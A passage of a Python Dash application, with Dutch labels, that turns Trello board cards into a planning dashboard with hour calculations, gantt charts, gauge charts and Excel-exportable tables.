customfields_dict[i['type']][i['id']]['name'] = i['name']\n chosenlists = []\n for i in config.get('Not Started'):\n chosenlists.append(i)\n chosenlists.extend(config.get('Blocked'))\n chosenlists.extend(config.get('Doing'))\n chosenlists.extend(config.get('Done'))\n for i in config.get('Epics'):\n chosenlists.append(i)\n for i in config.get('Always continuing'):\n chosenlists.append(i)\n for i in config.get('List with Epics Done'):\n chosenlists.append(i)\n\n def idtodate(cardid):\n hex = cardid[0:8]\n timestamp = int(hex, 16)\n timedate = datetime.fromtimestamp(timestamp)\n return timedate\n\n def get_epicid(url):\n try:\n if 'epicId=' in url:\n start = url.find('epicId=') + 7\n end = url.find('&attachmentId=')\n return url[start:end]\n else:\n pass\n except:\n pass\n kaarten = {i['id']: {'Naam': i['name'], 'KaartID': i['id'], 'ListID': i\n ['idList'], 'customfields': i['customFieldItems'], 'Aangemaakt':\n idtodate(i['id']), 'labels': [label['name'] for label in i['labels'\n ] if i['labels'] != []], 'members': [member['fullName'] for member in\n members if member['id'] in i['idMembers']], 'Sjabloon': i[\n 'isTemplate'], 'Vervaldatum': dateCalc(i['due']), 'Gearchiveerd': i\n ['closed'], 'epicid': [get_epicid(j['url']) for j in i[\n 'attachments']], 'Epic': None, 'shortUrl': i['shortUrl']} for i in\n cards}\n for i, j in kaarten.items():\n while None in j['epicid']:\n j['epicid'].remove(None)\n if j['members'] != []:\n j['Leden'] = ''\n for k in j['members']:\n if j['Leden'] == '':\n j['Leden'] += k\n else:\n j['Leden'] += ', ' + k\n else:\n j['Leden'] = None\n del j['members']\n if customfields_dict != {}:\n for i, j in customfields_dict.items():\n for k, l in j.items():\n for m, n in kaarten.items():\n n[l['name']] = None\n for i, j in kaarten.items():\n for k in j['customfields']:\n if k['idCustomField'] in customfields_dict['list'].keys():\n j[customfields_dict['list'][k['idCustomField']].get('name')\n ] = customfields_dict['list'][k['idCustomField']][\n 
'options'].get(k['idValue'])\n elif k['idCustomField'] in customfields_dict['checkbox'].keys(\n ):\n if k['value']['checked'] == 'true':\n j[customfields_dict['checkbox'][k['idCustomField']]\n .get('name')] = True\n else:\n j[customfields_dict['checkbox'][k['idCustomField']]\n .get('name')] = False\n elif k['idCustomField'] in customfields_dict['date'].keys():\n j[customfields_dict['date'][k['idCustomField']].get('name')\n ] = dateCalc(k['value'].get('date'))\n else:\n for key in k['value']:\n j[customfields_dict[key][k['idCustomField']].get(\n 'name')] = k['value'].get(key)\n epicIdNameCategory = []\n for i, j in kaarten.items():\n epicIdNameCategory.append((i, j['Naam'], j[config.get(\n 'Custom Field for Categories')]))\n for i, j in kaarten.items():\n if j['epicid'] == []:\n j['Epic'] = 'Geen epic'\n j['Categorie'] = None\n else:\n for k in epicIdNameCategory:\n if k[0] == j['epicid'][0]:\n j['Epic'] = k[1]\n j['Categorie'] = k[2]\n del j['epicid']\n for i, j in kaarten.items():\n for k in lists:\n if j['ListID'] == k['id']:\n j['Lijst'] = k['name']\n if j['Lijst'] in config.get('Not Started'):\n j['Status'] = 'Niet gestart'\n elif j['Lijst'] in config.get('Doing'):\n j['Status'] = 'Doing'\n elif j['Lijst'] in config.get('Blocked'):\n j['Status'] = 'Blocked'\n elif j['Lijst'] in config.get('Done'):\n j['Status'] = 'Done'\n elif j['Lijst'] in config.get('Always continuing'):\n j['Status'] = 'Doorlopend'\n elif j['Lijst'] in config.get('Epics'):\n j['Status'] = 'Epics Doing'\n elif j['Lijst'] in config.get('List with Epics Done'):\n j['Status'] = 'Epics Done'\n else:\n j['Status'] = 'Archived'\n del j['customfields']\n del j['ListID']\n for i, j in kaarten.items():\n if j['Gearchiveerd'] == True and j['Status'] != 'Done':\n j['Status'] = 'Archived'\n liststodelete = []\n for i in lists:\n if i['name'] not in chosenlists:\n liststodelete.append(i['name'])\n cardstodelete = []\n for i, j in kaarten.items():\n if j['Sjabloon'] == True:\n cardstodelete.append(i)\n 
elif j['Lijst'] in liststodelete:\n cardstodelete.append(i)\n hours = {}\n for i, j in kaarten.items():\n if j['Lijst'] == config.get('List for hours'):\n hours[j['Naam']] = {config['Custom Field for Starting date']: j\n [config['Custom Field for Starting date']], config[\n 'Custom Field for Ending date']: j[config[\n 'Custom Field for Ending date']], config[\n 'Custom Field with hours']: j[config[\n 'Custom Field with hours']]}\n for i in cardstodelete:\n if i in kaarten:\n del kaarten[i]\n tmpdatesdict = {}\n now = datetime.now().date()\n numdays = 365\n numdayshistory = 183\n for x in range(0, numdays):\n tmpdatesdict[str(now + timedelta(days=x))] = {}\n for x in range(0, numdayshistory):\n tmpdatesdict[str(now - timedelta(days=x))] = {}\n dates = []\n for i in sorted(tmpdatesdict):\n dates.append(i)\n arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten\n .values()])), 'xaxis_months': list(dict.fromkeys([(i[0:4] + '-' + i\n [5:7] + '-01') for i in dates])), 'perioden': list(dict.fromkeys([(\n i[0:4] + i[5:7]) for i in dates])), 'statuses': list(dict.fromkeys(\n [card['Status'] for card in kaarten.values()])), config.get(\n 'Custom Field for Categories'): list(dict.fromkeys([card[config.get\n ('Custom Field for Categories')] for card in kaarten.values()])),\n config.get('Custom Field for Person'): list(dict.fromkeys([(card[\n config.get('Custom Field for Person')] if card[config.get(\n 'Custom Field for Person')] != None else 'Geen ' + config.get(\n 'Custom Field for Person')) for card in kaarten.values()]))}\n try:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.\n get('Custom Field for Starting date'): kaart[config.get(\n 'Custom Field for Starting date')], config.get(\n 'Custom Field for Ending date'): kaart[config.get(\n 'Custom Field for Ending date')], 'Gebied': kaart['Gebied'],\n config.get('Custom 
Field for Person'): kaart[config.get(\n 'Custom Field for Person')], config.get(\n 'Custom Field for Categories'): kaart[config.get(\n 'Custom Field for Categories')], config.get(\n 'Custom Field with hours'): kaart[config.get(\n 'Custom Field with hours')], 'Cognosrapport': kaart[\n 'Cognosrapport'], 'Niet meenemen in telling': kaart[\n 'Niet meenemen in telling'], 'Lijst': kaart['Lijst'], 'Status':\n kaart['Status'], 'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for\n kaart in kaarten.values()}\n except:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.\n get('Custom Field for Starting date'): kaart[config.get(\n 'Custom Field for Starting date')], config.get(\n 'Custom Field for Ending date'): kaart[config.get(\n 'Custom Field for Ending date')], config.get(\n 'Custom Field for Person'): kaart[config.get(\n 'Custom Field for Person')], config.get(\n 'Custom Field for Categories'): kaart[config.get(\n 'Custom Field for Categories')], config.get(\n 'Custom Field with hours'): kaart[config.get(\n 'Custom Field with hours')], 'Lijst': kaart['Lijst'], 'Status':\n kaart['Status'], 'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for\n kaart in kaarten.values()}\n beschikbareuren = {key: {'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for key in\n hours.keys()}\n for i in dates:\n datekey = datetime.strptime(i, '%Y-%m-%d').date()\n for k, l in kaarten.items():\n if l['Niet meenemen in telling'] != True:\n try:\n if l[config.get('Custom Field for Starting date')].date(\n ) < datekey <= l[config.get(\n 'Custom Field for Ending date')].date():\n delta = l[config.get('Custom Field for Ending date')\n ] - l[config.get('Custom Field for Starting date')]\n hoursperday = int(l[config.get(\n 
'Custom Field with hours')]) / int(delta.days)\n urenperdagperkaart[l['Naam']]['urenperdag'][i\n ] = hoursperday\n except:\n pass\n for k, l in hours.items():\n try:\n if l[config.get('Custom Field for Starting date')].date(\n ) < datekey <= l[config.get('Custom Field for Ending date')\n ].date():\n hoursperday = int(l[config.get('Custom Field with hours')]\n ) / int(30.4)\n beschikbareuren[k]['urenperdag'][i] = hoursperday\n except:\n pass\n for i, j in urenperdagperkaart.items():\n for k, l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m == k[0:4] + k[5:7]:\n j['urenperperiode'][m] += l\n for i, j in beschikbareuren.items():\n for k, l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m == k[0:4] + k[5:7]:\n j['urenperperiode'][m] += l\n dfurenpermaand = copy.deepcopy(urenperdagperkaart)\n for i, j in dfurenpermaand.items():\n try:\n j['Geplande uren'] = int(j['Geplande uren'])\n except:\n j['Geplande uren'] = 0\n for k, l in j['urenperperiode'].items():\n j[k] = round(l, 2)\n del j['urenperperiode']\n bars = []\n labelsnietingepland = []\n for j in kaarten.values():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n labelsnietingepland.append(j['Lijst'])\n labelsnietingepland = list(dict.fromkeys(labelsnietingepland))\n for i, j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n tmp = []\n for label in labelsnietingepland:\n if j['Lijst'] == label:\n tmp.append(int(j['Geplande uren']))\n else:\n tmp.append(0)\n bars.append(dict(x=labelsnietingepland, y=tmp, name=j['Naam'],\n type='bar', opacity='0.6'))\n epicbars = []\n tmpepicsforbarchart = {epic: (0) for epic in 
[name['Naam'] for name in\n kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}\n tmpepicsforbarchart['Geen epic'] = 0\n for i, j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n tmpepicsforbarchart[j['Epic']] += int(j[config.get(\n 'Custom Field with hours')])\n epicsforbarchart = {k: v for k, v in tmpepicsforbarchart.items() if v != 0}\n epicbars.append(dict(x=[key for key in epicsforbarchart.keys()], y=[\n value for value in epicsforbarchart.values()], type='bar', text=[\n value for value in epicsforbarchart.values()], textposition=\n 'outside', opacity='0.6'))\n thismonth = datetime.strftime(datetime.now(), '%Y%m')\n nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')\n twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')\n arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,\n '%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,\n '%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,\n '%Y%m').strftime('%B'))]\n gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n thismonth]))\n gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n nextmonth]))\n gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n twomonths]))\n deltathismonth = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == thismonth]))\n deltanextmonth = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == nextmonth]))\n 
deltatwomonths = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == twomonths]))\n if deltathismonth > gaugegeplandthismonth:\n gaugerangethismonth = deltathismonth + 20\n else:\n gaugerangethismonth = gaugegeplandthismonth + 20\n if deltanextmonth > gaugegeplandnextmonth:\n gaugerangenextmonth = deltanextmonth + 20\n else:\n gaugerangenextmonth = gaugegeplandnextmonth + 20\n if deltatwomonths > gaugegeplandtwomonths:\n gaugerangetwomonths = deltatwomonths + 20\n else:\n gaugerangetwomonths = gaugegeplandtwomonths + 20\n gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltathismonth *\n 0.5], 'color': '#3deb34'}, {'range': [deltathismonth * 0.5, \n deltathismonth * 0.75], 'color': '#b4eb34'}, {'range': [\n deltathismonth * 0.75, deltathismonth * 0.9], 'color': '#ebb434'},\n {'range': [deltathismonth * 0.9, deltathismonth], 'color':\n '#eb6e34'}, {'range': [deltathismonth, gaugerangethismonth],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltathismonth}}\n gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltanextmonth *\n 0.5], 'color': '#3deb34'}, {'range': [deltanextmonth * 0.5, \n deltanextmonth * 0.75], 'color': '#b4eb34'}, {'range': [\n deltanextmonth * 0.75, deltanextmonth * 0.9], 'color': '#ebb434'},\n {'range': [deltanextmonth * 0.9, deltanextmonth], 'color':\n '#eb6e34'}, {'range': [deltanextmonth, gaugerangenextmonth],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}}\n gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltatwomonths *\n 0.5], 'color': '#3deb34'}, {'range': [deltatwomonths * 0.5, \n deltatwomonths * 0.75], 
'color': '#b4eb34'}, {'range': [\n deltatwomonths * 0.75, deltatwomonths * 0.9], 'color': '#ebb434'},\n {'range': [deltatwomonths * 0.9, deltatwomonths], 'color':\n '#eb6e34'}, {'range': [deltatwomonths, gaugerangetwomonths],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}}\n gaugefig = go.Figure()\n gaugefig.add_trace(go.Indicator(domain={'x': [0, 0.3], 'y': [0, 1]},\n value=gaugegeplandthismonth, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(thismonth, '%Y%m').\n strftime('%B')}, delta={'reference': deltathismonth}, gauge=\n gaugestepsthismonth))\n gaugefig.add_trace(go.Indicator(domain={'x': [0.35, 0.65], 'y': [0, 1]},\n value=gaugegeplandnextmonth, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(nextmonth, '%Y%m').\n strftime('%B')}, delta={'reference': deltanextmonth}, gauge=\n gaugestepsnextmonth))\n gaugefig.add_trace(go.Indicator(domain={'x': [0.7, 1], 'y': [0, 1]},\n value=gaugegeplandtwomonths, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(twomonths, '%Y%m').\n strftime('%B')}, delta={'reference': deltatwomonths}, gauge=\n gaugestepstwomonths))\n gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars,\n 'gaugefig': gaugefig}\n columntypes = {}\n for key, value in kaarten[next(iter(kaarten))].items():\n if 'datum' in key or key == 'Aangemaakt':\n columntypes[key] = 'datetime'\n elif type(value) == int:\n columntypes[key] = 'numeric'\n elif type(value in [str, bool]):\n columntypes[key] = 'text'\n columntypesurenpermaand = dict(columntypes)\n columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})\n data = {'kaarten': kaarten, 'arrays': arrays, 'urenperdagperkaart':\n urenperdagperkaart, 'beschikbareuren': beschikbareuren, 'graphdata':\n graphdata, 
'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,\n 'columntypes': columntypes, 'urenpermaand': pd.DataFrame(data=\n dfurenpermaand).T, 'columntypesurenpermaand': columntypesurenpermaand}}\n\n\ndef make_layout():\n return html.Div(className='First Div', children=[html.Div(style={\n 'font-style': 'italic', 'font-weight': 'bold', 'border': '10px',\n 'box-shadow': '8px 8px 8px grey', 'background': 'rgb(149,193,31)',\n 'background':\n 'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)'\n , 'margin-top': '1%', 'margin-bottom': '1%', 'margin-right': '1%',\n 'margin-left': '1%', 'border-radius': '10px', 'text-align':\n 'center'}, className='Banner', children=[html.Div(style={'display':\n 'inline-block', 'width': '80%'}, children=[html.H1(\n 'Trello borden USD')]), html.Div(style={'display': 'inline-block',\n 'margin-right': '1px'}, children=[html.Img(src=app.get_asset_url(\n 'logonop.png'), style={'width': '150px', 'margin-right': '0px'})])]\n ), html.H5('Kies hieronder een bord', style={'text-align': 'center'\n }), dcc.Dropdown(id='dropdown_boards', options=[{'label': i['name'],\n 'value': i['id']} for i in boards], value=boards[0]['id']), html.\n Button('Data verversen', id='refreshdatabtn', n_clicks=0), html.Div\n (id='test')])\n\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\nexternal_scripts = ['https://cdn.plot.ly/plotly-locale-nl-latest.js']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets,\n external_scripts=external_scripts, url_base_pathname='/dash/')\napp.layout = make_layout\napp.config['suppress_callback_exceptions'] = True\n\n\n@app.callback(Output('test', 'children'), [Input('dropdown_boards', 'value'\n ), Input('refreshdatabtn', 'n_clicks')])\ndef create_maindiv(value, n_clicks):\n get_data(value)\n import os\n if os.name == 'nt':\n daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')\n else:\n daterefreshed = datetime.strftime(datetime.now(), '%A 
%-d %B, %H:%M')\n return html.Div(className='', children=[dcc.Markdown(\n '**Laatst ververst: **' + daterefreshed), dcc.Tabs(className='Tabs',\n children=[dcc.Tab(label='Gantt charts', style=globals['styles'][\n 'tabs'], children=[html.Div(className='tab2_div1', style=globals[\n 'styles']['maindivs'], children=[html.H3('Uitleg'), html.Div(style=\n globals['styles']['divgraphs'], children=[dcc.Markdown(\n 'In dit tabblad worden de kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'\n )])]), html.Div(className='tab2_div2', style=globals['styles'][\n 'maindivs'], children=[html.H4('Gantt per epic'), dcc.Dropdown(\n style=globals['styles']['dropdowns'], id='dropdownganttepics',\n options=[{'label': name, 'value': name} for name in data['arrays'][\n 'epics']], value=[next(iter(data['arrays']['epics']))]), html.Div(\n style=globals['styles']['divgraphs'], children=[dcc.Graph(id=\n 'ganttepics')])]), html.Div(className='tab2_div3', style=globals[\n 'styles']['maindivs'], children=[html.H4('Gantt per persoon'), dcc.\n Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdownganttpersoon', options=[{'label': name, 'value': name} for\n name in data['arrays'][config.get('Custom Field for Person')]]),\n dcc.Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdownganttpersoonstatus', options=[{'label': name, 'value':\n name} for name in data['arrays']['statuses']], value=data['arrays']\n ['statuses'], multi=True), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Graph(id='ganttpersoon')])])]), dcc.Tab\n (label='Data export', style=globals['styles']['tabs'], children=[\n html.Div(className='tab3_div1', style=globals['styles']['maindivs'],\n children=[html.H3('Uitleg'), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Markdown(\n \"Hieronder kan de data worden geëxporteerd. 
Via de buttons 'Export' downloadt je een excelbestand.\"\n ), dcc.Markdown(\n \"In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. Kies dan de velden, filter daarna en klik op 'Export'.\"\n )])]), html.Div(className='tab3_div2', style=globals['styles'][\n 'maindivs'], children=[html.H4('Platte dump'), dcc.Markdown(\n 'Deze tabel laat de platte data zien, zoals in Trello gevuld.'),\n dash_table.DataTable(id='table_plattedump', columns=[{'name': i,\n 'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable': \n True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']\n ['columntypes'].keys()], data=data['dfs']['kaartendf'].to_dict(\n 'records'), hidden_columns=[i for i in data['dfs']['columntypes']],\n export_format='xlsx', export_headers='display', export_columns=\n 'all', filter_action='native', sort_action='native', sort_mode=\n 'multi', style_table={'overflowX': 'scroll'}, style_header={\n 'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',\n 'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={\n 'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',\n 'text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'})]),\n html.Div(className='tab3_div3', style=globals['styles']['maindivs'],\n children=[html.H4('Uren per maand'), dcc.Markdown(\n 'Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'\n ), dcc.Markdown(\n 'Ook hierin kan gefilterd worden. 
filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'\n ), dash_table.DataTable(id='table_urenpermaand', columns=[{'name':\n i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i),\n 'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in\n data['dfs']['columntypesurenpermaand'].keys()], data=data['dfs'][\n 'urenpermaand'].to_dict('records'), hidden_columns=[i for i in data\n ['dfs']['columntypesurenpermaand']], export_format='xlsx',\n export_headers='display', export_columns='all', filter_action=\n 'native', sort_action='native', sort_mode='multi', style_header={\n 'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',\n 'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={\n 'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',\n 'text-align': 'left', 'fontFamily': 'Arial'})])]), dcc.Tab(label=\n 'Langetermijnplanning', style=globals['styles']['tabs'], children=[\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H3('Uitleg'), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Markdown(\n 'In dit tabblad wordt een langetermijnplanning getoond.'), dcc.\n Markdown('De focus hierbij ligt vooral op de categorieen.')])]),\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H4('Ingeplande uren per categorie'), dcc.Dropdown(\n style=globals['styles']['dropdowns'], id='dropdownurenpermaand',\n options=[{'label': name, 'value': name} for name in data['arrays'][\n config.get('Custom Field for Categories')] if name != None], multi=\n True, searchable=False, value=data['arrays'][config.get(\n 'Custom Field for Categories')]), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Graph(id='urenpermaand')])]), html.Div(\n className='tab1_div3', style=globals['styles']['maindivs'],\n children=[html.H4('Nog in te plannen uren (per lijst)'), dcc.\n Markdown(\n '*Nieuw* zijn 
werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'\n ), dcc.Markdown(\n '*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'\n ), dcc.Markdown(\n '*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'), dcc.\n Markdown(\n '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(id='graph_nietingepland', figure={'data': data['graphdata'][\n 'nietingepland'], 'layout': globals['graphlayouts']['bars']})])]),\n html.Div(className='tab1_div4', style=globals['styles']['maindivs'],\n children=[html.H4('Nog in te plannen uren (per epic)'), dcc.\n Markdown(\n '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(id='graph_nietingepland_epics', figure={'data': data[\n 'graphdata']['nietingeplandepics'], 'layout': globals[\n 'graphlayouts']['bars']})])])]), dcc.Tab(style=globals['styles'][\n 'tabs'], label='Tactische planning', children=[html.Div(className=\n 'maindivs', style=globals['styles']['maindivs'], children=[html.H3(\n 'Uitleg'), dcc.Markdown(\n 'In dit tabblad is een middellange termijnplanning te zien.')]),\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H4('Totalen'), dcc.Markdown(\n 'Hieronder staan twee totaaloverzichten van de aankomende maanden.'\n ), dcc.Markdown(\n 'De blauwe balk geeft de ingeplande uren weer. 
De streep geeft de beschikbare uren aan.'\n ), dcc.Markdown(\n 'Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(figure=data['graphdata']['gaugefig'])])]), html.Div(className\n ='maindivs', style=globals['styles']['maindivs'], children=[html.H4\n ('Gantt'), dcc.Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdowngantttactisch', options=[{'label': j, 'value': i} for i, j in\n data['arrays']['threemonths']], multi=False, searchable=False,\n value=data['arrays']['threemonths'][0][0]), html.Div(style=globals[\n 'styles']['divgraphs'], children=[dcc.Graph(id='gantttactisch')])])\n ])])])\n\n\n@app.callback(Output('gantttactisch', 'figure'), [Input(\n 'dropdowngantttactisch', 'value')])\ndef update_gantttactisch(v1):\n if v1 != None:\n if v1[4:] == '12':\n v1plus1 = str(int(v1[0:4]) + 1) + '01'\n else:\n v1plus1 = str(int(v1) + 1)\n if v1[4:] == '01':\n v1min1 = str(int(v1[0:4]) - 1) + '12'\n else:\n v1min1 = str(int(v1) - 1)\n if v1[4:] == '11':\n v1plus2 = str(int(v1[0:4]) + 1) + '01'\n else:\n v1plus2 = str(int(v1) + 2)\n import random\n import numpy as np\n from operator import itemgetter\n ganttdata = []\n monthkey = int(v1)\n for i, j in data['kaarten'].items():\n if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:\n try:\n if int(datetime.strftime(j['Begindatum'], '%Y%m')\n ) <= monthkey and int(datetime.strftime(j[\n 'Einddatum'], '%Y%m')) >= monthkey:\n if j['Begindatum'].date() < datetime.strptime(\n v1min1 + '01', '%Y%m%d').date():\n start = datetime.strptime(v1min1 + '01', '%Y%m%d'\n ).date()\n else:\n start = j['Begindatum'].date()\n if j['Einddatum'].date() >= datetime.strptime(\n v1plus2 + '01', '%Y%m%d').date():\n eind = datetime.strptime(v1plus2 + '01', '%Y%m%d'\n ).date()\n else:\n eind = j['Einddatum'].date()\n ganttdata.append(dict(Task=j['Epic'], Start=start,\n Finish=eind, Resource=j['Naam'] + ' (uren: ' +\n 
str(round(data['urenperdagperkaart'][j['Naam']]\n ['urenperperiode'][v1])) + ')'))\n except:\n pass\n result = sorted(ganttdata, key=itemgetter('Task'))\n rgb = []\n for c in range(len(result)):\n r = list(np.random.choice(range(256), size=3))\n s2 = ','.join(map(str, r))\n s1 = 'rgb('\n s3 = ')'\n rgb.append(s1 + s2 + s3)\n fig = ff.create_gantt(result, index_col='Resource', show_colorbar=\n True, group_tasks=False, showgrid_x=True, showgrid_y=True,\n colors=rgb)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n fig.add_trace(go.Scatter(mode='lines', x=[v1[0:4] + '-' + v1[4:] +\n '-01', v1[0:4] + '-' + v1[4:] + '-01'], y=[-1, len(result)],\n line={'shape': 'spline', 'color': 'black', 'width': 4},\n showlegend=False))\n fig.add_trace(go.Scatter(mode='lines', x=[v1plus1[0:4] + '-' +\n v1plus1[4:] + '-01', v1plus1[0:4] + '-' + v1plus1[4:] + '-01'],\n y=[-1, len(result)], line={'shape': 'spline', 'color': 'black',\n 'width': 4}, showlegend=False))\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('ganttpersoon', 'figure'), [Input(\n 'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',\n 'value')])\ndef update_ganttpersoon(v1, v2):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j[config.get('Custom Field for Person')] == v1 and j['Status'\n ] != 'Archived' and j['Status'] in v2:\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Epic']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': 
go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('ganttepics', 'figure'), [Input('dropdownganttepics',\n 'value')])\ndef update_ganttepics(value):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j['Epic'] == value and j['Status'] != 'Archived':\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Status']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('urenpermaand', 'figure'), [Input(\n 'dropdownurenpermaand', 'value')])\ndef update_urenpermaand(value):\n layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)', xaxis={'title': 'Datum', 'gridcolor': 